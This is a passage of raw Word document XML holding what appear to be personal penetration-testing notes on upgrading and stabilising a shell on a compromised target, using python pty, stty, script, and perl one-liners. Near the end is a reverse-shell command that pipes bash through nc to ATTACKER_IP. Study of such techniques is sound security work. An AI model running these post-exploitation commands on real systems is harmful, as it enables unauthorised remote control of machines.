          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                     </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001001">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm                                                                                        </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001002">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z                                                                                                 </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001003">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001004">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001005">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once inside a machine, run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if python installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run interactive shell:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python -c "import pty; pty.spawn('bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If python doesn't work, try python 2 or 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'import pty;pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After using Python, here's how to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to allow copy and paste and tab autocomplete:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw: Passes input directly to the shell without processing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo: Prevents your input from being echoed (displayed) back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This enables advanced terminal features like cursor movement, colors, and line editing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to background the shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gets the most recent shell from background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To test if </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">worked, it should not copy the commands when you use them. Like if you use "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it shouldn't echo that command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001019">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Bash to stabilize (if python don't work):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script /dev/null -c bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if Perl exists:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001023">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command on the target to upgrade the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'exec "/bin/bash";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'exec "/bin/sh";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001028">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001029">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nc to stabilize (upon looking again, this seems to start a new reverse shell, not stabilize it):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -i | nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTACKER_IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
